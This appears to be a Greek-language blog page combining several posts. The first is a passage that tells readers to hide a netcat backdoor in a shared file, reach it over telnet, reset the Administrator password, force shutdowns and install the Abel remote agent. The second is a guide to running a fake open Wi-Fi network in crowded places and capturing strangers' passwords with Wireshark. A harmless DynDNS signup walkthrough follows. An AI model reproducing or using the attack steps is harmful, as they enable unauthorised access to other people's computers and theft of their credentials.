Μπορούμε φυσικά να κρύψουμε αυτό το αρχείο σε ένα άλλο αρχείο και να το διαμοιράσουμε μέσα στο δίκτυο.Όταν κάποιος τρέξει το αρχείο το netcat θα αντιγραφεί στον υπολογιστή του και θα ανοίξει μία θύρα στην προκειμένη περίπτωση είναι η 9999.Μόλις η θύρα ανοίξει μπορούμε να χρησιμοποιήσουμε το telnet σε αυτήν την θύρα του απομακρυσμένου υπολογιστή και να αποκτήσουμε πλήρης πρόσβαση.
Τώρα που έχουμε πλήρης πρόσβαση το επόμενα βήμα είναι να αλλάξουμε το administrator password με την εντολή:
net user Administrator newpassword
Πλέον μπορούμε να κάνουμε ότι θέλουμε στον υπολογιστή όπως για παράδειγμα να τερματίσουμε την λειτουργία του κτλ.Μπορούμε να το κάνουμε αυτό απλώς αν μπούμε στον φάκελο System32 και πληκτρολογήσουμε το παρακάτω:
shutdown -r -t 10 -c “Hello”
Ο απομακρυσμένος υπολογιστής θα κάνει επανεκκίνηση μέσα σε 10 δευτερόλεπτα.Μπορούμε αν θέλουμε να το προχωρήσουμε ακόμα πιο μακριά απλά και μόνο αν εγκαταστήσουμε το Cain & Abel στον υπολογιστή μας και μετά εγκαταστήσουμε το Abel στον απομακρυσμένο υπολογιστή εφόσον πλέον ξέρουμε και το administrator password.Μόλις εγκατασταθεί το Abel στον απομακρυσμένο υπολογιστή μπορούμε να κάνουμε εκκίνηση και τερματισμό υπηρεσίων και πολλά περισσότερα… 
Κατεβάστε το netcat από εδώ.

Δημιουργία ψεύτικου δικτύου για εύρεση κωδικών

Όλοι οι χρήστες έχουν την τάση εφόσον βρίσκουν κάποιο ασύρματο δίκτυο να προσπαθούν να συνδεθούν προκειμένου να εκμεταλευτούν την σύνδεση για να διαβάσουν τα email τους,να μπούνε στο facebook,να μιλήσουν MSN κτλ.Εμείς μπορούμε να εκμεταλευτούμε αυτήν την τάση προς ώφελο μας  φυσικά και να δημιουργήσουμε ένα ψεύτικο δίκτυο (που θα φαίνεται όμως σαν αληθινό για τους απέξω) για να ανακαλύψουμε κωδικούς και διάφορες άλλες πληροφορίες.
Τι θα χρειαστούμε?
  • Ένα laptop
  • Μία σύνδεση στο Internet ασύρματη (κατά προτίμηση 3G)
  • Το wireshark
Δημιουργία του δικτύου
Το πρώτο πράγμα που θα πρέπει να κοιτάξουμε είναι να επιβεβαιώσουμε ότι η ασύρματη κάρτα δικτύου μας υποστηρίζει την δημιουργία ad-hoc δικτύων.Εφόσον το δούμε αυτό δημιουργούμε ένα νέο δίκτυο ad-hoc με την ονομασία linksys διότι τα linksys είναι από τα router που χρησιμοποιούνται συνήθως και είναι πολύ πιθανό να βρίσκεται στην λίστα της ασύρματης τους κάρτας με τα δίκτυα που θα συνδέονται αυτόματα.Το ad-hoc το επιλέγουμε γιατί οι υπόλοιποι υπολογιστές που θα συνδεθούν στο δίκτυο θα συνδεθούν μέσω του υπολογιστή μας.Δηλαδή ο υπολογιστής μας θα είναι φαινομενικά για αυτούς ο router που όμως στην πραγματικότητα δεν θα υπάρχει.
Αφού δημιουργήσαμε το δίκτυο ενεργοποιούμε από τις ιδιότητες της νέας σύνδεσης του δικτύου μας το ICS (Internet Connection Sharing).Ο λόγος που θα το κάνουμε αυτό είναι για να έχουν πρόσβαση στο Internet όλοι όσοι συνδεθούν στο δίκτυο μας.
Αν βρισκόμαστε με το laptop μας σε κάποια περιοχή με πολύ κόσμο όπως κάποιο mall,τότε είναι πολύ πιθανό αρκετοί χρήστες να αρχίσουν να συνδέονται αφού συνηθώς πολλοί άνθρωποι ψάχνουν για δίκτυα είτε με τα netbook τους,είτε με τα κινητά τους τηλέφωνα προκειμένου να τσεκάρουν τα email τους κτλ.Δεδομένου ότι το δικό μας δίκτυο θα είναι και ανοικτό ακόμα και αν δεν βρίσκεται στην auto connect λίστα της κάρτας τους είναι πολύ πιθανό κάποιοι να το προτιμήσουν.
Εύρεση των κωδικών
Τώρα που έχουμε κάποια άτομα συνδεδεμένα στο δίκτυο μας θα πρέπει να αρχίσουμε να ελέγχουμε το τι κάνουν με την σύνδεση μας.Γι’αυτό θα χρειαστούμε το wireshark το οποίο είναι ουσιαστικά ένα sniffer και θα ελέγχει όλα τα πακέτα που θα περνάνε από το δίκτυο μας και κατά συνέπεια και όλα τα passwords που θα εισαχθούν σε ιστοσελίδες.Το ρυθμίζουμε ώστε να κάνει capture το interface (δηλαδή την κάρτα δικτύου) που χρησιμοποιούμε για να διαμοιράσουμε το Internet και το αφήνουμε να καταγράφει όλη την κίνηση του δικτύου και κατά συνέπεια και τους κωδικούς σε περίπτωση που κάποιος χρήστης του δικτύου τους εισάγει σε κάποια ιστοσελίδα.
Πρακτικά δεν έχουμε να κάνουμε κάτι άλλο απλά να το αφήσουμε για κάποια ώρα το wireshark και μετά να αναλύσουμε τα πακέτα για να  εντοπίσουμε τα passwords.Η λογική πίσω από αυτήν την τεχνική είναι να παίξουμε με την μνήμη των laptop/netbook και λοιπών gadget που όλο και σε κάποιο linksys δίκτυο θα έχουν συνδεθεί στο παρελθόν και έτσι να συνδεθούν αυτόματα πάνω σε μας αλλά και το γεγονός ότι θα πρόκειται για ένα ανοικτό δίκτυο σίγουρα θα προσελκύσει και άλλους επίδοξους χρήστες.

Τετάρτη 14 Αυγούστου 2013

Tι είναι Dynamic DNS, Port Forwarding & NAT;

Σε αυτό το άρθρο θα μάθουμε μερικές βασικές έννοιες γύρω από τον κόσμο του ADSL όπως το Dynamic DNS, Port Forwarding & NAT. Αυτές οι βασικές έννοιές θα πρέπει να τις ξέρετε από την πρώτη σας επαφή με το ΑDSL.


Ας τις γνωρίσουμε μία-μία…


Αρχίζοντας με το Dynamic DNS!


Dynamic DNS


Πώς θα ήταν το Internet αν σε κάθε site που σας αρέσει και θα θέλατε να επισκεφθείτε να αντιστοιχούσε ένας δεκαψήφιος αριθμός; Σίγουρα δεν θα ήταν το ευκολότερο για να το θυμηθείτε ,ε; Ευτυχώς για αυτή την δουλειά υπάρχουν οι λεγόμενοι Domain Name Servers που, κρατώντας ένα μεγάλο αρχείο μπορούν ανά πάσα στιγμή να μας ενημερώνουν για τον αριθμό που κρύβετε πίσω από το όνομα κάθε μεγάλου site (adslgr.com).

To ίδιο ισχύει και για τις ADSL συνδέσεις, αφού όπως είπαμε είναι αρκετά εύκολο και και απλό να κρατήσουμε μια σύνδεση ανοιχτή για αρκετές μέρες, χρησιμοποιώντας την για διάφορους λόγους, όπως για την δημιουργία ενός File Server, που θα μας επιτρέπει να έχουμε πρόσβαση στα αρχεία που βρίσκονται στον υπολογιστή του σπιτιού ενώ εμείς βρισκόμαστε στο γραφείο μας ή στο σπίτι ενός φίλου. Επίσης μπορούμε να κάνουμε ένα gaming server για εμάς και τους φίλους μας.


Αν θέλουμε λοιπόν να αντικαταστήσουμε την IP Address μας σε με ένα εύκολο όνομα μπορούμε να το κάνουμε σχεδόν ανέξοδα αποφεύγοντας την χρέωση από registration ενός Domain χρησιμοποιώντας κάποια από τις πολλές υπηρεσίες Dynamic DNS. Oι εν λόγω υπηρεσίες μας ,μας προσφέρουν τις περισσότερες φορές αφιλοκερδώς να μας προμηθεύσουν με ένα δικτυακό όνομα , το οποίο θα επιλέξουμε ανάμεσα στα πολλά που διαθέτουν.

Μια απλή έρευνα για Dynamic DNS στο Google θα μας οδηγήσει κατευθείαν στις μεγαλύτερες όπως η www.DynDNS.com και η www.No-IP.com . To registration είναι εξαιρετικά απλό και μπορούμε να ολοκληρώσουμε την διαδικασία μέσα σε λίγα λεπτά. Το δυσκολότερο ίσως πρόβλημα που θα αντιμετωπίσουμε είναι η επιλογή κάποιου από τα πολλά domains που διαθέτει η κάθε εταιρία, το οποίο θα χρησιμοποιήσουμε ως βάσει το δικό μας.


Έτσι για παράδειγμα αν έχουμε σκοπό να «σηκώσουμε» κάποιον game server μπορούμε να επιλέξουμε το domain «game-host.org» και κατόπιν να δηλώσουμε το όνομα που θα το συνοδεύει. Το όνομα θα πρέπει να έχει την μορφή «mygameserver.game-host.org». Νομίζω ότι είναι πολύ απλό!?

Το καλύτερο όμως δεν σας το είπα ακόμη! Αν και αρκετές από αυτές τις υπηρεσίες λειτουργούν καλύτερα όταν συνοδεύονται που ενημερώνουν αυτόματα τους servers τους, όπως είναι το DynSite, υπάρχει η δυνατότητα να χρησιμοποιήσουμε ακόμα και το router μας (αν το υποστηρίζει, φυσικά) γλιτώνοντας ακόμη περισσότερα χρήματα.

Όλα τα router της USR τουλάχιστον, υποστηρίζουν αυτήν την δυνατότητα. Γι’αυτό λοιπόν χρειάζεται μεγάλη προσοχή στη συσκευή που θα επιλέξουμε για να σερφάρουμε στο Διαδίκτυο!


Βάλαμε την adsl, ωραία, αλλά υπάρχει ένα πρόβλημα θέλουμε πχ να έχουμε πρόσβαση στον υπολογιστή μας από κάποιον άλλον, αλλά οι παροχοί μας λένε "+ τόσα ευρώ"


Και όμως υπάρχει λύση!


Για αρχή θα γίνει μια ανάλυση της υπηρεσίας http://www.dyndns.org

Καθώς και οι οδηγίες θα είναι για τον client των windows
Το πρώτο που πρέπει να κάνουμε είναι να τρέξουμε τον αγαπημένο μας Browser και να πάμε στην διεύθυνση http://www.dyndns.org

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  step1.jpg 
Εμφανίσεις:  0 
Μέγεθος:  84,2 KB 
ID: 8280

Κάνουμε "κλικ" στο singup now


Εδώ πρέπει να δώσουμε κάποια στοιχεία μας (πρέπει να βάλουμε σωστό email address)

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  first1a.jpg 
Εμφανίσεις:  1 
Μέγεθος:  110,7 KB 
ID: 8281

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  first1b.jpg 
Εμφανίσεις:  0 
Μέγεθος:  89,6 KB 
ID: 8282

Εφόσον δώσουμε τα στοιχεία μας πατάμε στο "create account"


Μετά κάνουμε έλεγχο στο inbox από το email Που δώσαμε , μιας και θα μας στείλουν το μήνυμα ενεργοποίησης


Κάτι σαν αυτό

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  registeryes.jpg 
Εμφανίσεις:  0 
Μέγεθος:  8,5 KB 
ID: 8284

το ανοίγουμε

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  activate.jpg 
Εμφανίσεις:  0 
Μέγεθος:  56,9 KB 
ID: 8286

και πατάμε εκεί που λέει "to confirm your account......."

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  confirmed.jpg 
Εμφανίσεις:  0 
Μέγεθος:  59,0 KB 
ID: 8288

Πλέον είμαστε έτοιμοι, κάνουμε Login in

(Πάνω αριστερά)

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  logedin.jpg 
Εμφανίσεις:  0 
Μέγεθος:  35,1 KB 
ID: 8287


Ωραία είμαστε πλέον χρήστες..................

Τώρα τι κάνουμε;

Πρέπει να πάμε στο services

Και μετά να επιλέξουμε την επιλογή "dynamic Dns"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  dynimic.jpg 
Εμφανίσεις:  1 
Μέγεθος:  98,5 KB 
ID: 8289

Πατάμε στο "Add Dynamic DNS"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  adddyn.jpg 
Εμφανίσεις:  0 
Μέγεθος:  113,3 KB 
ID: 8290

Στο αμέσως επόμενο μενού μας δίνει την δυνατότητα να επιλέξουμε το όνομα που θέλουμε

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  adddyn2.jpg 
Εμφανίσεις:  1 
Μέγεθος:  72,6 KB 
ID: 8291

Βάζουμε ένα όνομα που μας αρέσει στο "hostname" επιλέγουμε την κατάληξη από το drop down menu, και πατάμε το "add host"

εφόσον το όνομα που διαλέξαμε δεν το έχει κάποιος άλλος θα μας εμφανίσει

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  yesdyn.jpg 
Εμφανίσεις:  0 
Μέγεθος:  61,1 KB 
ID: 8292

Ωραία μέχρι εδώ, έχουμε πλέον το δικό μας όνομα στο Internet, αλλά έχουμε πρόβλημα με την ενημέρωση αυτού (το dynamic που λέγαμε)

[break=Ρυθμίση Update client]

Όπως είπα δεν θα μιλήσω σχετικά με το πως θα περάσουμε τις ρυθμίσεις σε κάποιο ρουτερ που τα υποστηρίζει,
Θα μιλήσουμε για τον Update client τον οποίο μπορείτε να βρείτε εδώ
Η έδω


Η εγκατάσταση είναι πολύ απλή,

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set1.jpg 
Εμφανίσεις:  0 
Μέγεθος:  26,2 KB 
ID: 8294
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set2.jpg 
Εμφανίσεις:  0 
Μέγεθος:  45,7 KB 
ID: 8295
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set3.jpg 
Εμφανίσεις:  0 
Μέγεθος:  23,7 KB 
ID: 8296
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set4.jpg 
Εμφανίσεις:  0 
Μέγεθος:  22,4 KB 
ID: 8297
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set5.jpg 
Εμφανίσεις:  0 
Μέγεθος:  25,9 KB 
ID: 8298
Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set6.jpg 
Εμφανίσεις:  0 
Μέγεθος:  26,5 KB 
ID: 8299
τα ωραία ξεκινάνε μετά την επιλογή "launch DNS updater"

Πρώτη κίνηση

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set21.jpg 
Εμφανίσεις:  0 
Μέγεθος:  29,0 KB 
ID: 8300

Δεύτερη

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set22.jpg 
Εμφανίσεις:  0 
Μέγεθος:  25,2 KB 
ID: 8301

Επιλέγουμε το "Local Area Network"

Συνεχίζουμε με το "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set23.jpg 
Εμφανίσεις:  0 
Μέγεθος:  26,8 KB 
ID: 8303

Επιλέγουμε το "detect my ip" (ώστε να βρει αυτόματα την Ip μας)

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set24.jpg 
Εμφανίσεις:  0 
Μέγεθος:  34,7 KB 
ID: 8304

Συνεχίζουμε με "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set25.jpg 
Εμφανίσεις:  0 
Μέγεθος:  20,2 KB 
ID: 8305

Βάζουμε ένα όνομα (για δικιά μας ευκολία)

πατάμε "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set26.jpg 
Εμφανίσεις:  0 
Μέγεθος:  20,6 KB 
ID: 8306

Δίνουμε εδώ τα στοιχεία που δώσαμε κατά την εγράφη μας

και πάλι πατάμε "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set27.jpg 
Εμφανίσεις:  0 
Μέγεθος:  33,7 KB 
ID: 8307

Μας ενημερώνει ότι έχουμε μια υπηρεσία σε αυτό το όνομα χρήστη

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set28.jpg 
Εμφανίσεις:  0 
Μέγεθος:  25,1 KB 
ID: 8308

Επιλέγουμε την υπηρεσία (checkbox) και πατάμε "Next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  set29.jpg 
Εμφανίσεις:  0 
Μέγεθος:  18,8 KB 
ID: 8309

Τσεκάρουμε το "enable automatic updates", πατάμε "next"

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  finish.jpg 
Εμφανίσεις:  0 
Μέγεθος:  18,4 KB 
ID: 8310

Και "finish"

Καλορίζικο το static "DNS"